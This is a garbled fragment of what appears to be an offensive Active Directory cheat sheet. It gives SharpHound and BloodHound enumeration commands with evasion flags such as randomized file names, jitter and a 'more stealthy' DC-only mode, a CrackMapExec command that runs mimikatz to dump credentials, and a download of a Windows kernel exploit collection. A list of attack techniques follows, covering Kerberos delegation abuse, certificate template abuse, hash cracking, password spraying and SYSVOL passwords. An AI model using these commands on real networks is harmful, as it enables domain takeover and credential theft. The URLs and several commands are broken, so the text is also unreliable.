$ git clone https: // /SecWiki /windows -kernel -exploits
# or locally/remotely from an ADExplorer snapshot from SysInternals (ADExplorer remains a legitimate binary signed by Microsoft, avoiding detection with security solutions)
# Collect more data for certificates exploitation using Certipy
Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory
# or remotely via BloodHound Python
# bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc -c all
SharpHound.exe -c all,GPOLocalGroup -outputdirectory C:\Windows\Temp -randomizefilenames -prettyjson -nosavecache -encryptzip -collectallproperties -throttle 10000 -jitter 23
# or run the collector on the machine using Powershell
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
SharpHound.exe -c all -LdapUsername -LdapPassword -domaincontroller 10.10.
SharpHound.exe -c all -LdapUsername -LdapPassword -JSONFolder
SharpHound.exe -CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy)
SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default
SharpHound.exe -c all -d active.htb -searchforest
# run the collector on the machine using SharpHound.exe
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
cme mimikatz -server http -server -port 80 14.0 / 24 -u user -p 'Password ' -local -auth -M mimikatz
cme smb -M name_module -o VAR = DATA
wget https: // /byt3bl33d3r /CrackMapExec /releases /download /v5.
# use the latest release, CME is now a binary packaged with all its dependencies

Kerberos Bronze Bit Attack - CVE-2020-17049
Kerberos Resource Based Constrained Delegation
MS-EFSRPC Abuse with Unconstrained Delegation
SpoolService Abuse with Unconstrained Delegation
Privileged Access Management (PAM) Trust
Forest to Forest Compromise - Trust Ticket
Child Domain to Forest Compromise - SID Hijacking
GenericWrite and Remote Connection Manager
ESC7 - Vulnerable Certificate Authority Access Control
ESC3 - Misconfigured Enrollment Agent Templates
ESC2 - Misconfigured Certificate Templates
ESC1 - Misconfigured Certificate Templates
DNS Poisoning - Relay delegation with mitm6
LDAP signing not required and LDAP channel binding disabled
Capturing and cracking Net-NTLMv2/NTLMv2 hashes
Capturing and cracking Net-NTLMv1/NTLMv1 hashes
Password of Pre-Created Computer Account
Spray passwords against the RDP service
Passwords in SYSVOL